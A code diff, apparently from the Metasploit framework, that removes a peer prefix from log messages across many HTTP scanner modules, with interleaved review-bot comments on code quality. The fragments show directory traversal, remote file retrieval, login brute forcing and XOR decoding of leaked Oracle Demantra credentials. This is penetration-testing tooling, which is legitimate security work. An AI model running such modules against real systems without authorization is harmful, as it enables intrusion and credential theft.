@@ -119,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration") - print_status("#{peer} - HP SiteScope Configuration saved in #{path}") - print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data") + print_status("HP SiteScope Configuration saved in #{path}") + print_status("HP SiteScope Configuration is saved as Java serialization data") return end - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index db77012186..5d060660b9 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -50,7 +50,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APIMonitorImpl') @@ -59,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -88,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" + "\r\n" - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") uri = normalize_uri(@uri, 'services/APIMonitorImpl') 
@@ -104,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m loot = CGI.unescapeHTML($1) if not loot or loot.empty? - print_status("#{peer} - Retrieved empty file") + print_status("Retrieved empty file") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") end end diff --git a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb index 4862e49216..20cceac73b 100644 --- a/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb +++ b/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb @@ -173,15 +173,15 @@ class Metasploit3 < Msf::Auxiliary version = get_version(res) unless version.blank? - print_status("#{peer} - Version detected: #{version}") + print_status("Version detected: #{version}") unless is_version_tested?(version) - print_warning("#{peer} - You're running the module against a version we have not tested") + print_warning("You're running the module against a version we have not tested") end end sys_name = get_system_name(res) unless sys_name.blank? - print_status("#{peer} - System name detected: #{sys_name}") + print_status("System name detected: #{sys_name}") report_note( :host => ip, :type => "system.name", @@ -190,7 +190,7 @@ class Metasploit3 < Msf::Auxiliary end if anonymous_access?(res) - print_good("#{peer} - No login necessary. Server allows anonymous access.") + print_good("No login necessary. Server allows anonymous access.") return end 
diff --git a/modules/auxiliary/scanner/http/influxdb_enum.rb b/modules/auxiliary/scanner/http/influxdb_enum.rb index 4e13b6ad46..a4b17dcea8 100644 --- a/modules/auxiliary/scanner/http/influxdb_enum.rb +++ b/modules/auxiliary/scanner/http/influxdb_enum.rb @@ -41,29 +41,29 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) rescue ::Errno::EPIPE, ::Timeout::Error, ::EOFError, ::IOError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end unless res - print_error("#{peer} - Server did not respond in an expected way.") + print_error("Server did not respond in an expected way.") return end if res.code == 401 && res.body =~ /Invalid username\/password/ - print_error("#{peer} - Failed to authenticate. Invalid username/password.") + print_error("Failed to authenticate. Invalid username/password.") return elsif res.code == 200 && res.headers.include?('X-Influxdb-Version') && res.body.length > 0 - print_status("#{peer} - Enumerating...") + print_status("Enumerating...") begin temp = JSON.parse(res.body) if temp.blank? - print_status("#{peer} - Json data is empty") + print_status("Json data is empty") return end results = JSON.pretty_generate(temp) rescue JSON::ParserError - print_error("#{peer} - Unable to parse JSON data.") + print_error("Unable to parse JSON data.") return end print_good("Found:\n\n#{results}\n") @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary results, 'InfluxDB Enum' ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Unable to enum, received \"#{res.code}\"") + print_error("Unable to enum, received \"#{res.code}\"") end end end diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index 8a5a866338..7bd5df2dad 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb 
@@ -43,17 +43,17 @@ class Metasploit3 < Msf::Auxiliary }) unless res - vprint_error("#{peer} - No response received") + vprint_error("No response received") return end unless res.headers.include?('X-Jenkins') - vprint_error("#{peer} - responded with #{res.code} but does not seem to be Jenkins") + vprint_error("responded with #{res.code} but does not seem to be Jenkins") return end version = res.headers['X-Jenkins'] - print_status("#{peer} - Jenkins Version - #{version}") + print_status("Jenkins Version - #{version}") report_service( :host => rhost, :port => rport, @@ -91,13 +91,13 @@ class Metasploit3 < Msf::Auxiliary 'ctype' => 'text/plain', }) unless res - vprint_error("#{peer} - Timeout") + vprint_error("Timeout") return end case res.code when 200 - print_good("#{peer} - #{uri_path} does not require authentication (200)") + print_good("#{uri_path} does not require authentication (200)") report_note({ :type => "jenkins_path", :host => rhost, 
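Review bot: With the prefix removed, `vprint_error("responded with #{res.code} but does not seem to be Jenkins")` in the jenkins_enum.rb `@@ -43,17` hunk is a sentence fragment whose subject used to be the peer. I would give it a subject of its own: `vprint_error("Server responded with #{res.code} but does not seem to be Jenkins")`. The other messages in this hunk are complete sentences without the prefix.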
@@ -120,22 +120,22 @@ class Metasploit3 < Msf::Auxiliary ) end when 403 - print_status("#{peer} - #{uri_path} restricted (403)") + print_status("#{uri_path} restricted (403)") when 401 - print_status("#{peer} - #{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") + print_status("#{uri_path} requires authentication (401): #{res.headers['WWW-Authenticate']}") when 404 - print_status("#{peer} - #{uri_path} not found (404)") + print_status("#{uri_path} not found (404)") when 301 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") when 302 - print_status("#{peer} - #{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") + print_status("#{uri_path} is redirected (#{res.code}) to #{res.headers['Location']} (not following)") else - print_status("#{peer} - #{uri_path} Don't know how to handle response code #{res.code}") + print_status("#{uri_path} Don't know how to handle response code #{res.code}") end end def parse_system_info(body) - vprint_status("#{peer} - Getting useful information from systemInfo") + vprint_status("Getting useful information from systemInfo") infos = { "os.name" => nil, "os.version" => nil, diff --git a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb index 811261b7cc..87894f3c57 100644 --- a/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb 
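Review bot: The `when 301` and `when 302` branches in the `@@ -120,22` hunk have identical bodies, and this commit had to edit both copies. Merging them into `when 301, 302` with a single `print_status` call keeps the two from drifting apart on the next change. The `case` statement starts outside the hunk.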
@@ -68,14 +68,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") + print_good("Vulnerable to CVE-2015-2562 (search_category_id parameter SQL injection)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb index 2ae1d62bb8..760418ed0a 100644 --- a/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb +++ b/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), @@ -85,14 +85,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") + print_good("Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla!") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb index da0562c0b6..66072a6adb 100644 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb 
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary 'htaccess.txt' ] - vprint_status("#{peer} - Checking for interesting pages") + vprint_status("Checking for interesting pages") pages.each do |page| scan_pages(tpath, page, ip) end @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary note = "Registration Page" end - print_good("#{peer} - #{note}: #{tpath}#{page}") + print_good("#{note}: #{tpath}#{page}") report_note( :host => ip, @@ -90,13 +90,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index a199aef541..dee21277e9 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary tpath += '/' end - vprint_status("#{peer} - Checking for interesting plugins") + vprint_status("Checking for interesting plugins") res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET' @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary nsize = res.body.size if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") + print_good("Plugin: #{tpath}#{papp} ") report_note( :host => ip, :port => rport, 
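Review bot: In joomla_plugins.rb the `@@ -60,7` hunk reads `res.body.size` and `res.code`, and the `@@ -129,7` and `@@ -139,7` hunks read `res1.code`, with no nil check on the response. Other modules in this patch treat a missing response as a normal case (`unless res` followed by "No response received"), and the rescue list in the `@@ -156,13` hunk does not cover NoMethodError. A target that stops answering would therefore raise out of the scan, assuming there is no guard outside the hunks. I would test the response first, e.g. `if res1 && res1.code == 200`.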
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary ) if (papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") + print_good("Vulnerability: Potential LFI") report_web_vuln( :host => ip, :port => rport, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'Local File Inclusion' ) elsif (res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") + print_good("Vulnerability: Potential SQL Injection") report_web_vuln( :host => ip, :port => rport, @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'SQL Injection' ) elsif (papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") + print_good("Vulnerability: Potential XSS") report_web_vuln( :host => ip, :port => rport, @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + print_good("Page: #{tpath}index.php?option=com_#{pages}") report_note( :host => ip, :port => datastore['RPORT'], @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) else - vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + vprint_error("Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") end end elsif (res.code == 403) @@ -156,13 +156,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end 
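Review bot: `res1.code` in the `@@ -129,7` hunk of joomla_plugins.rb is read without checking that a response came back, and the reworded `vprint_error` in the `@@ -139,7` hunk reads it again. If the request returns nil (assuming `res1` is the result of the `send_request_cgi` call that closes just above), this raises NoMethodError, which none of the rescue clauses in the `@@ -156,13` hunk catch. Changing the condition to `if res1 && res1.code == 200` and the `else` to `elsif res1` would avoid that. The enclosing method starts and ends outside these hunks.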
diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 9748b7f676..3d6acc979a 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -48,17 +48,17 @@ class Metasploit3 < Msf::Auxiliary def get_users users = nil - vprint_status("#{peer} - Reading users from master...") + vprint_status("Reading users from master...") res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'ReadUsersFromMasterServlet')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 404 - vprint_error("#{peer} - Could not find 'ReadUsersFromMasterServlet'") + vprint_error("Could not find 'ReadUsersFromMasterServlet'") elsif res.code == 200 && res.body =~ /<discoverydata>(.+)<\/discoverydata>/ users = res.body.scan(/<discoverydata>(.*?)<\/discoverydata>/) - vprint_good("#{peer} - Found #{users.length} users") + vprint_good("Found #{users.length} users") else - vprint_error("#{peer} - Could not find any users") + vprint_error("Could not find any users") end users end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary ] ) - vprint_status("#{peer} - Parsing user data...") + vprint_status("Parsing user data...") users.each do |user| record = parse_user_data(user.to_s) next if record.join.empty? @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary cred_table << [user, pass, hash, role, mail, salt] if pass - print_status("#{peer} - Found weak credentials (#{user}:#{pass})") + print_status("Found weak credentials (#{user}:#{pass})") credential_data = { origin_type: :service, module_fullname: self.fullname, diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 8774079b5d..77d6dc7091 100644 
--- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + print_error("Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -80,10 +80,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index a0a33b9188..8a5734b6b9 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb 
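Review bot: The local assignment `peer = "#{ip}:#{rport}"` at the top of the `@@ -51,7` hunk of manageengine_securitymanager_traversal.rb looks dead after this change, because every message in the visible hunks that interpolated it has been rewritten. If nothing else in the method reads it, the line should be deleted so the next reader does not assume the prefix is still built locally. The same leftover appears in support_center_plus_directory_traversal.rb at `@@ -48,7`. Both methods extend beyond the hunks, so check for other uses before removing the line.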
@@ -132,17 +132,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.headers['Content-Length'].to_i - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 6644b0b7d4..5f7bb5fc2b 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ - print_good("#{peer} - Request may have succeeded on file #{file}") + print_good("Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Auxiliary }) loot = store_loot("lfi.data","text/plain", rhost, res.body, file) - vprint_good("#{peer} - File #{file} downloaded to: #{loot}") + vprint_good("File #{file} downloaded to: #{loot}") elsif res and res.code - vprint_error("#{peer} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + vprint_error("Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary user = datastore['USERNAME'] pass = datastore['PASSWORD'] - vprint_status("#{peer} - Trying to login with #{user} / #{pass}") + vprint_status("Trying to login with #{user} / #{pass}") # test login begin 
@@ -100,14 +100,14 @@ class Metasploit3 < Msf::Auxiliary return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("#{peer} - Successful login #{user}/#{pass}") + vprint_good("Successful login #{user}/#{pass}") else - vprint_error("#{peer} - No successful login possible with #{user}/#{pass}") + vprint_error("No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return :abort end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index bc2663f8f3..de18f8805b 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index 844c503987..cabefe1b8f 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb 
@@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = res.body f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 49e1d33495..6bcc2dcb1e 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { "Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="} }) rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index f78d63b8c2..3402e97dd7 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb 
@@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -59,15 +59,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 302 and res.headers['Location'] and res.headers['Location'].include?("/provision/index.php")) - vprint_good("#{peer} - Running OpenMind Message-OS Provisioning portal...") + vprint_good("Running OpenMind Message-OS Provisioning portal...") return true else - vprint_error("#{peer} - Application is not OpenMind. Module will not continue.") + vprint_error("Application is not OpenMind. Module will not continue.") return false end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 302 and res.headers['Location'].include?("frameset")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, 
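Review bot: In openmind_messageos_login.rb the login check in the `@@ -116,12` hunk calls `res.headers['Location'].include?("frameset")` without first testing that the header is present, although the probe in the `@@ -59,15` hunk of the same file does test `res.headers['Location']`. A 302 response without a Location header would presumably raise NoMethodError rather than be reported as a failed login. `res.headers['Location'].to_s.include?("frameset")` keeps the condition on one line. The same unguarded pattern is visible in oracle_ilom_login.rb (`res.headers['Server'].include?` at `@@ -57,15`) and radware_appdirector_enum.rb (`res.headers['Location'].include?('redirectId')` at `@@ -116,12`). `do_login` continues outside the hunk.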
@@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index fb87ec82e4..4d69c421a2 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -53,25 +53,25 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved") + vprint_error("No content retrieved") return end if res.code == 404 - vprint_error("#{peer} - File not found") + vprint_error("File not found") return end if res.code == 200 creds = "" - vprint_status("#{peer} - String received: #{res.body.to_s}") unless res.body.blank? + vprint_status("String received: #{res.body.to_s}") unless res.body.blank? res.body.to_s.split(",").each do|c| i = c.to_i ^ 0x50 creds += i.chr end - print_good("#{peer} - Credentials decoded: #{creds}") unless creds.empty? + print_good("Credentials decoded: #{creds}") unless creds.empty? end end diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index bc29b6d04c..2f1167132c 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end 
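Review bot: The decode loop in the `@@ -53,25` hunk of oracle_demantra_database_credentials_leak.rb passes server-controlled values to `i.chr` with no range check. `c.to_i ^ 0x50` falls outside 0..255 whenever a comma-separated field is negative or larger than a byte, and `Integer#chr` then raises RangeError, which aborts the run for that host. Adding `next unless i.between?(0, 255)` after the XOR restricts the decoder to well-formed input. The method starts outside the hunk.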
@@ -57,15 +57,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager")) - vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...") + vprint_good("Running Oracle Integrated Lights Out Manager portal...") return true else - vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.") + vprint_error("Application is not Oracle ILOM. Module will not continue.") return false end end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -117,12 +117,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end 
